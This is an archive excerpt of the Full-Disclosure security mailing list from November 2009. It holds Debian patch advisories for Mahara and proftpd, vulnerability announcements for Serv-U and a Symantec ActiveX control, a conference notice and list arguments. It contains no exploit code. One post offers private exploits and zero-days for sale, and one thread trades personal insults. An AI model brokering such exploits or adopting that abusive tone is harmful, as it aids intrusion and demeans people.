From white at debian.org  Sun Nov  1 11:08:44 2009
From: white at debian.org (Steffen Joeris)
Date: Sun,  1 Nov 2009 22:08:44 +1100 (EST)
Subject: [Full-disclosure] [SECURITY] [DSA 1924-1] New mahara packages fix
	several vulnerabilities
Message-ID: <20091101110844.BCE9F848861@hannah.localdomain>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1924-1                  security at debian.org
http://www.debian.org/security/                      Steffen Joeris
October 31, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : mahara
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2009-3298 CVE-2009-3299

Two vulnerabilities have been discovered in, an electronic portfolio,
weblog, and resume builder.  The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2009-3298

Ruslan Kabalin discovered a issue with resetting passwords, which could
lead to a privilege escalation of an institutional administrator
account.

CVE-2009-3299

Sven Vetsch discovered a cross-site scripting vulnerability via the
resume fields.


For the stable distribution (lenny), these problems have been fixed in
version 1.0.4-4+lenny4.

The oldstable distribution (etch) does not contain mahara.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem will be fixed soon.


We recommend that you upgrade your mahara packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny4.dsc
    Size/MD5 checksum:     1304 a89de002e60d1435fe9c7375cdd353b3
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4.orig.tar.gz
    Size/MD5 checksum:  2383079 cf1158e4fe3cdba14fb1b71657bf8cc9
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny4.diff.gz
    Size/MD5 checksum:    40473 61fa7821c6637801a3f7a22ed5993233

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/mahara/mahara-apache2_1.0.4-4+lenny4_all.deb
    Size/MD5 checksum:     7908 ce0748a7b83729e5f987529b871f9428
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny4_all.deb
    Size/MD5 checksum:  1637754 cf0bdb218c9fbd5723f1be19ac4b84a6


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkrsvj4ACgkQ62zWxYk/rQdqEgCfYUqtPnoTGmAOhw8j1OZFmdQv
1gAAoJWYH98HT5jkEJsRYSYvrFrNvnB/
=etyf
-----END PGP SIGNATURE-----


From white at debian.org  Sun Nov  1 11:08:54 2009
From: white at debian.org (Steffen Joeris)
Date: Sun,  1 Nov 2009 22:08:54 +1100 (EST)
Subject: [Full-disclosure] [SECURITY] [DSA 1925-1] New proftpd-dfsg packages
	fix SSL certificate verification weakness
Message-ID: <20091101110854.E8EF4848861@hannah.localdomain>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1925-1                  security at debian.org
http://www.debian.org/security/                      Steffen Joeris
October 31, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : proftpd-dfsg
Vulnerability  : insufficient input validation
Problem type   : remote
Debian-specific: no
CVE Id         : CVE-2009-3639

It has been discovered that proftpd-dfsg, a virtual-hosting FTP daemon,
does not properly handle a '\0' character in a domain name in the
Subject Alternative Name field of an X.509 client certificate, when the
dNSNameRequired TLS option is enabled.


For the stable distribution (lenny), this problem has been fixed in
version 1.3.1-17lenny4.

For the oldstable distribution (etch), this problem has been fixed in
version 1.3.0-19etch3.

Binaries for the amd64 architecture will be released once they are
available.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem has been fixed in version 1.3.2a-2.


We recommend that you upgrade your proftpd-dfsg packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.0-19etch3.tar.gz
    Size/MD5 checksum:  1905969 38528feb0ffb9bd88db6f175d6020b8d
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.0-19etch3.dsc
    Size/MD5 checksum:      872 0bd9359e5bf664360be0c144225649b2

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mysql_1.3.0-19etch3_all.deb
    Size/MD5 checksum:   162748 5608f61ea367720d306635309b85d6bc
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-ldap_1.3.0-19etch3_all.deb
    Size/MD5 checksum:   162748 e16562c92cdc0f0c344ded50f5916d36
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-pgsql_1.3.0-19etch3_all.deb
    Size/MD5 checksum:   162752 98b538acf18e6c6a7fedfcaab1a35dee
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-doc_1.3.0-19etch3_all.deb
    Size/MD5 checksum:   492828 eb6950dbd7f5a48fea262fa373224d01

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch3_alpha.deb
    Size/MD5 checksum:   997748 b6db8df62a1a19529b8a75cd3965c61c

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch3_arm.deb
    Size/MD5 checksum:   803396 01f586c57a9df10f764b1250182aaf4a

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch3_hppa.deb
    Size/MD5 checksum:   936038 662b6032362df105994979458344e4c5

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch3_i386.deb
    Size/MD5 checksum:   798022 44f0f80e230c4f86e12daf20129ec636

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch3_ia64.deb
    Size/MD5 checksum:  1188390 9e68db2aa07f4f477e050f961e766bd5

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch3_mips.deb
    Size/MD5 checksum:   856696 0a9f117d838b1b612d05c88ac76caed4

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch3_mipsel.deb
    Size/MD5 checksum:   856038 3b04229098a901c9b4de298443af7aff

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.0-19etch3_sparc.deb
    Size/MD5 checksum:   830844 08971c1104010e23c01d52b343b11f56

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-17lenny4.dsc
    Size/MD5 checksum:     1349 825576201541f76cbc1dcab44bae9e61
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-17lenny4.diff.gz
    Size/MD5 checksum:   103691 8b4252ad95f772b66b7dd06d60a1bfa6
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1.orig.tar.gz
    Size/MD5 checksum:  2662056 da40b14c5b8ec5467505c98b4ee4b7b9

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-doc_1.3.1-17lenny4_all.deb
    Size/MD5 checksum:  1256500 001a1754365940758a4ec97ead34fb34
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.1-17lenny4_all.deb
    Size/MD5 checksum:   195088 1951485bf96a4a688495c5ebfa050749

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_alpha.deb
    Size/MD5 checksum:   215366 e95e97a49984acf80828d18da59c72e9
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_alpha.deb
    Size/MD5 checksum:   783554 921f2efef6cc2fc8688bcbb6ca9d8b59
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_alpha.deb
    Size/MD5 checksum:   204746 ab8e55b37a646a496bb122e32d90b067
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_alpha.deb
    Size/MD5 checksum:   204640 5e3dc3781500c2c5a577e39ec4446d75

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_arm.deb
    Size/MD5 checksum:   214036 187789bcd2eb7d18e6ff207b296011db
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_arm.deb
    Size/MD5 checksum:   203356 c6ac828e324d4cd79675d893b2b9af4c
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_arm.deb
    Size/MD5 checksum:   203202 465de4f3bc6b6532208a22ba96a2a7f9
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_arm.deb
    Size/MD5 checksum:   699814 f463140d95df55d8cd301c567878e397

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_armel.deb
    Size/MD5 checksum:   213884 8b1501c1cfa5a61c6af8ca3c121dddda
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_armel.deb
    Size/MD5 checksum:   705542 f03e97c4a517b1b44af58eeba70d9db3
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_armel.deb
    Size/MD5 checksum:   203634 68c067db2619d26b9544688d1e9e7e8b
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_armel.deb
    Size/MD5 checksum:   203526 43efcc97292d5d0545748c6210a32689

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_hppa.deb
    Size/MD5 checksum:   216732 a718ff67e4b488ef3052e6a1045c89f5
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_hppa.deb
    Size/MD5 checksum:   764824 fe6033f5797b6a163ed8ce552eb7182a
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_hppa.deb
    Size/MD5 checksum:   205296 a675af7ef1807e1e7f8cdacabf28a9c9
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_hppa.deb
    Size/MD5 checksum:   205144 3644789a8d2e181cfdac74a2a80ac85e

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_i386.deb
    Size/MD5 checksum:   203274 aaebf117359a3d9da24ad44d54b92370
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_i386.deb
    Size/MD5 checksum:   203216 0b22db02bddba0d783049e83311526a5
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_i386.deb
    Size/MD5 checksum:   688914 f7088094d696ab673f9e91631adc3bb6
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_i386.deb
    Size/MD5 checksum:   212408 262af8522ecd16b57c11af409db528cb

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_ia64.deb
    Size/MD5 checksum:   980974 8ab9bfd7088b9740a27a54760059b3e9
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_ia64.deb
    Size/MD5 checksum:   222164 3ac1225c263d2678563fe0fa63a37cde
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_ia64.deb
    Size/MD5 checksum:   207428 c2a8edc2d5f2943034ccadf0c6d67c21
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_ia64.deb
    Size/MD5 checksum:   207274 0c4d9685cfe8479fcb24ef7eb86f301d

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_mips.deb
    Size/MD5 checksum:   212246 f90b614ab734af4e75cb15d45d7571bd
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_mips.deb
    Size/MD5 checksum:   691796 c2caa9adce6dd3d44c53a91e6c7b7e88
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_mips.deb
    Size/MD5 checksum:   203262 f4947609b2a1e3b1016ff6a9b7c21d4c
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_mips.deb
    Size/MD5 checksum:   203344 27701f545ffd35ec7fccf456a91a34ce

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_mipsel.deb
    Size/MD5 checksum:   203266 566d885e4619eae83a3986cac1a28ad7
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_mipsel.deb
    Size/MD5 checksum:   203412 62a1ae565c42e326ae2a129add355155
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_mipsel.deb
    Size/MD5 checksum:   689126 f87ca4149400a5ac5bc3e17f149170b8
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_mipsel.deb
    Size/MD5 checksum:   211804 6a32fca4e5b5cb68821670a0f59aa5ad

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny4_sparc.deb
    Size/MD5 checksum:   203744 e11aedfb13f8c65a7866b3aa35a35780
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny4_sparc.deb
    Size/MD5 checksum:   701992 1bb07d6070f54a0f84d237bb353c1149
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny4_sparc.deb
    Size/MD5 checksum:   203486 583c76972206a115b83c6af5f700727a
  http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny4_sparc.deb
    Size/MD5 checksum:   213718 59f82a39914654ba2a32ce50613dc83a


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkrta9wACgkQ62zWxYk/rQeDUgCfdLL9M9AYk3FihGSfLQxT5sGK
gcAAoLdYCFgKXMySMt5m7+4Gu0zH9sVE
=4qQL
-----END PGP SIGNATURE-----


From nikolaos at rangos.de  Sun Nov  1 00:08:58 2009
From: nikolaos at rangos.de (Nikolaos Rangos)
Date: Sun, 1 Nov 2009 01:08:58 +0100
Subject: [Full-disclosure] KC Security Services .
Message-ID: <82FDD59AE1E14032998D3367F762A21C@PC1>

KC Security is born.
___________________

View the announcement PDF here: http://rangos.de/KC%20Security.pdf - http://www.rangos.de

Everything security related will from now on be published under this name and in a corporate way.

If you are in need of hardcore private exploits and/or 0days, for penetrations testers and security conpanies only, drop me a note
at nikolaos<at>rangos.de


Thanks for your time,

Nikolaos Rangos
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091101/c3e7e024/attachment.html 

From pete.licoln at gmail.com  Mon Nov  2 08:57:02 2009
From: pete.licoln at gmail.com (Pete Licoln)
Date: Mon, 2 Nov 2009 03:57:02 -0500
Subject: [Full-disclosure] Hash
In-Reply-To: <5ae653bf0910290029v54a71a62y788e0aa048519801@mail.gmail.com>
References: <4b13609c0910282301q3d6d9384l6804c5b9a1f5918f@mail.gmail.com>
	<5ae653bf0910290029v54a71a62y788e0aa048519801@mail.gmail.com>
Message-ID: <dd979be40911020057k76d406c2w78bf7fd140842d25@mail.gmail.com>

Fionnbharr,
laurent is blackhat peace of spit asshole, and you're an attention seeker.
Everyone knows, the only remote bug you can find is  an xss or even better a
csrf.
laurent will find some nastie stufft as always, but will totally screw up at
disclosing theses issues (as argumented before the smb2 bugm aka soulseek).
Your troll sucks fionnbharr davies no one cares about you, and will, you're
like dropped tcp packet.

2009/10/29 Fionnbharr <thouth at gmail.com>

> That sure would have be some funny words, glad I'm not talking about
> how difficult to exploit it is! That would make me look pretty dumb
> bringing something totally unrelated to my comment into the argument.
>
> Yeeeeeeeeeep.
>
> 2009/10/29 laurent gaffie <laurent.gaffie at gmail.com>:
> > Bonjour Fionnbharr Davies!,
> >
> > I'm glad to make your life easier with the shasum full path, really.
> >
> > Regarding the "Grossly misdiagnosed bug";
> > That's some funny words to describe one of the most difficult bug to
> exploit
> > in 2009 (http://seclists.org/dailydave/2009/q4/2)
> >
> >
> >
> >
> > Laurent
> >
> >
> > Bonjour!
> >
> > Is this going to be another grossly misdiagnosed bug?
> >
> > Also I'm glad you put that /usr/bin at the start, it would have been
> > confusing otherwise.
> >
> >
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091102/6cf0a211/attachment.html 

From thouth at gmail.com  Mon Nov  2 11:47:52 2009
From: thouth at gmail.com (Fionnbharr)
Date: Mon, 2 Nov 2009 22:47:52 +1100
Subject: [Full-disclosure] Hash
In-Reply-To: <dd979be40911020057k76d406c2w78bf7fd140842d25@mail.gmail.com>
References: <4b13609c0910282301q3d6d9384l6804c5b9a1f5918f@mail.gmail.com>
	<5ae653bf0910290029v54a71a62y788e0aa048519801@mail.gmail.com>
	<dd979be40911020057k76d406c2w78bf7fd140842d25@mail.gmail.com>
Message-ID: <5ae653bf0911020347h6c5d7398h1acbf1fb4fb742bb@mail.gmail.com>

It's true, Laurent is a blackhat. I am glad the security community at
large is accepting this fact. This matter has been passed onto his
soon to be employers.

Aside from that I'm not trolling, just speaking my mind. Something
you're obviously familiar with doing. Can't we be friends? I mean, you
don't like that Krakow Labs person either. It's can be the icebreaker
in our internet relationship. We can have and eDinner and discuss
interesting topics like your broken english and terrible comparisons.

Eventually though our love with wither and we'll stop mIRC32ing
together so much. It'll happen slowly at first, taking 30+ mins to
reply to a query, but it'll quickly grow much like our mutual
ambivalence. Until one day I'll care about you as much as a dropped
like a UDP packet.

:_(

2009/11/2 Pete Licoln <pete.licoln at gmail.com>:
> Fionnbharr,
> laurent is blackhat peace of spit asshole, and you're an attention seeker.
> Everyone knows, the only remote bug you can find is ?an xss or even better a
> csrf.
> laurent will find some nastie stufft as always, but will totally screw up at
> disclosing theses issues (as argumented before the smb2 bugm aka soulseek).
> Your troll sucks fionnbharr davies no one cares about you, and will, you're
> like dropped tcp packet.
>
> 2009/10/29 Fionnbharr <thouth at gmail.com>
>>
>> That sure would have be some funny words, glad I'm not talking about
>> how difficult to exploit it is! That would make me look pretty dumb
>> bringing something totally unrelated to my comment into the argument.
>>
>> Yeeeeeeeeeep.
>>
>> 2009/10/29 laurent gaffie <laurent.gaffie at gmail.com>:
>> > Bonjour Fionnbharr Davies!,
>> >
>> > I'm glad to make your life easier with the shasum full path, really.
>> >
>> > Regarding the "Grossly misdiagnosed bug";
>> > That's some funny words to describe one of the most difficult bug to
>> > exploit
>> > in 2009 (http://seclists.org/dailydave/2009/q4/2)
>> >
>> >
>> >
>> >
>> > Laurent
>> >
>> >
>> > Bonjour!
>> >
>> > Is this going to be another grossly misdiagnosed bug?
>> >
>> > Also I'm glad you put that /usr/bin at the start, it would have been
>> > confusing otherwise.
>> >
>> >
>> >
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>


From nikolaos at rangos.de  Sun Nov  1 22:18:39 2009
From: nikolaos at rangos.de (Nikolaos Rangos)
Date: Sun, 1 Nov 2009 23:18:39 +0100
Subject: [Full-disclosure] KCSEC-00000001-ServUWebClient
Message-ID: <F2083DB214264A2F8E1C82EEE0F319EC@PC1>

Hello list, the vulnerability named "RhinoSoft.com Serv-U 9.0.0.5 WebClient 
Remote Buffer Overflow"
can be found at http://www.rangos.de/ServU-ADV.txt.

Best Regards,

Nikolaos Rangos 


From deepsec at deepsec.net  Sun Nov  1 23:42:42 2009
From: deepsec at deepsec.net (DeepSec Conference - Announcement)
Date: Mon,  2 Nov 2009 00:42:42 +0100 (CET)
Subject: [Full-disclosure] Reminder for DeepSec 2009 Conference
Message-ID: <20091101234242.7268BD006047@majere.luchs.at>

== DeepSec In-Depth Security Conference 2009 "TripleSec" ==

This is a reminder for the third DeepSec conference, taking place between
17th and 20th November at the Imperial Riding School Renaissance Hotel.

== Schedule ==

The schedule of all presentations can be found on our web site:
https://deepsec.net/schedule/

Random speaker and content from the schedule:

Karsten Nohl from H4RDW4RE will present the latest development on his project
to break A5/1 with the help of pre-computed tables as announced at HAR 2009.
Karsten Nohl says, that a public PoC on cracking GSM"s encryption is
necessary to raise awareness about the risks of sending sensitive information
over GSM networks. In March 2008 the finalisation of A5/1 rainbow tables was
announced but never released in public, the first academic attacks date even
back to 1997. Today it is believed that agencies and well-funded
organizations have access to efficient A5/1 crackers. Publishing a practical
attack in public will give a better awareness about the situation of an
encryption scheme that was designed and developed in the 1980ies and still
used today.

More talks at the conference! - https://deepsec.net/register/

== Sponsors ==

We would like to thank our sponsors that have supported the conference:
Microsoft, Sourcefire, Global Knowledge, The British Bookshop, Viennese
Chamber of Commerce and CERT.at.

== About DeepSec ==

DeepSec IDSC is an annual European two-day in-depth conference on computer,
network, and application security. The DeepSec Conference will be held from
November 17th to 20th 2009 in Vienna, and aims to bring together the
world's leading security professionals from academics, government,
industry, and the underground hacking community.

In addition to the conference with presentations we will offer a selection
of two-day intense security training courses before the main conference.

DeepSec is a non-product, non-vendor-biased conference. Our aim is to
present the best research and experience from the fields' leading experts.


Best regards,
DeepSec In-Depth Security Conference organisation team:

Michael Kafka, DeepSec GmbH
Ren? Pfeiffer, DeepSec GmbH
Initiated by Paul B?hm, DeepSec GmbH

Contact: https://deepsec.net/contact/


From arasm at vt.edu  Mon Nov  2 13:51:32 2009
From: arasm at vt.edu (Memisyazici, Aras)
Date: Mon, 2 Nov 2009 08:51:32 -0500
Subject: [Full-disclosure] Dark side of bookmarks
Message-ID: <20DE79EA3783484A94EF626CFBEB95B305DA7086CC@rivendell.cc.w2k.vt.edu>

MustLive:

I really don't want to start a flame-war nor am I trying to belittle you or your work but...

Your "article", unless I misunderstood, is useless. To explain further, your article lacks substance. For instance you state: "could be used in DoS attack for browsers" yet you provide no working PoC/example(s)

What about mitigation? What about prevention?

No offense but scare-tactics don't help ANYBODY... As a sysadmin, I would've appreciated some more details or at least some answers to my questions above! :)

In any case, thank you for putting together such an entry and look forward to your continued, hopefully improved research results!

Sincerely,
Aras 'Russ' Memisyazici
Systems Administrator
Virginia Tech

----------------------------------------------------------------------

Date: Sat, 31 Oct 2009 23:24:50 +0200
From: "MustLive" <mustlive at websecurity.com.ua>
Subject: [Full-disclosure] Dark side of bookmarks
To: <full-disclosure at lists.grok.org.uk>
Hello participants of Full-Disclosure!

After my articles about different attacks via redirectors - Redirectors: the
phantom menace (http://websecurity.com.ua/3495/) and Attacks via closed
redirectors (http://websecurity.com.ua/3531/), here is my new article. This
time about attacks via bookmarks. In article Dark side of bookmarks
(http://websecurity.com.ua/3643/) I'll tell you about risks of bookmarks in
browsers.

There are possible next attacks via bookmarks:

1. Spam.
2. Phishing.
3. Malware spreading.
4. DoS attacks.

You can read the article Dark side of bookmarks at my site:
http://websecurity.com.ua/3643/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

------------------------------


From s.u.n at free.Fr  Mon Nov  2 15:19:14 2009
From: s.u.n at free.Fr (S/U/N)
Date: Mon, 02 Nov 2009 16:19:14 +0100
Subject: [Full-disclosure] Dark side of bookmarks
In-Reply-To: <20DE79EA3783484A94EF626CFBEB95B305DA7086CC@rivendell.cc.w2k.vt.edu>
References: <20DE79EA3783484A94EF626CFBEB95B305DA7086CC@rivendell.cc.w2k.vt.edu>
Message-ID: <4AEEF872.6060708@free.Fr>

Just READ the post
and find this page
http://translate.google.com/translate?u=http%3A%2F%2Fwebsecurity.com.ua%2F2454%2F&sl=uk&tl=en&hl=fr&ie=UTF-8

************************  Cluster #[[   Memisyazici, Aras   ]] possibly
emitted, @Time [[   02/11/2009 14:51   ]] The Following #String 
**********************
> MustLive:
>
> I really don't want to start a flame-war nor am I trying to belittle you or your work but...
>
> Your "article", unless I misunderstood, is useless. To explain further, your article lacks substance. For instance you state: "could be used in DoS attack for browsers" yet you provide no working PoC/example(s)
>
> What about mitigation? What about prevention?
>
> No offense but scare-tactics don't help ANYBODY... As a sysadmin, I would've appreciated some more details or at least some answers to my questions above! :)
>
> In any case, thank you for putting together such an entry and look forward to your continued, hopefully improved research results!
>
> Sincerely,
> Aras 'Russ' Memisyazici
> Systems Administrator
> Virginia Tech
>
> ----------------------------------------------------------------------
>
> Date: Sat, 31 Oct 2009 23:24:50 +0200
> From: "MustLive" <mustlive at websecurity.com.ua>
> Subject: [Full-disclosure] Dark side of bookmarks
> To: <full-disclosure at lists.grok.org.uk>
> Hello participants of Full-Disclosure!
>
> After my articles about different attacks via redirectors - Redirectors: the
> phantom menace (http://websecurity.com.ua/3495/) and Attacks via closed
> redirectors (http://websecurity.com.ua/3531/), here is my new article. This
> time about attacks via bookmarks. In article Dark side of bookmarks
> (http://websecurity.com.ua/3643/) I'll tell you about risks of bookmarks in
> browsers.
>
> There are possible next attacks via bookmarks:
>
> 1. Spam.
> 2. Phishing.
> 3. Malware spreading.
> 4. DoS attacks.
>
> You can read the article Dark side of bookmarks at my site:
> http://websecurity.com.ua/3643/
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>   


From nso-research at sotiriu.de  Mon Nov  2 20:14:51 2009
From: nso-research at sotiriu.de (NSO Research)
Date: Mon, 02 Nov 2009 21:14:51 +0100
Subject: [Full-disclosure] NSOADV-2009-001: Symantec ConsoleUtilities
 ActiveX Control buffer overflow
Message-ID: <4AEF3DBB.1090604@sotiriu.de>

_________________________________________
Security Advisory NSOADV-2009-001
_________________________________________
_________________________________________


  Title:                  Symantec ConsoleUtilities ActiveX Control
                          Buffer Overflow
  Severity:               Critical
  Advisory ID:            NSOADV-2009-001
  Found Date:             09.09.2009
  Date Reported:          15.09.2009
  Release Date:           02.11.2009
  Author:                 Nikolas Sotiriu
  Mail:                   nso-research at sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2009-001.txt
  Vendor:                 Symantec (http://www.symantec.com/)
  Affected Products:      Symantec Altiris Notification Server 6.x
                          Symantec Management Platform 7.0.x
                          Symantec Altiris Deployment Solution 6.9.x
  Affected Component:     ConsoleUtilities ActiveX Control V.6.0.0.1846
  Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000
  Remote Exploitable:     Yes
  Local Exploitable:      No
  CVE-ID:                 CVE-2009-3031
  Patch Status:           Vendor released an patch
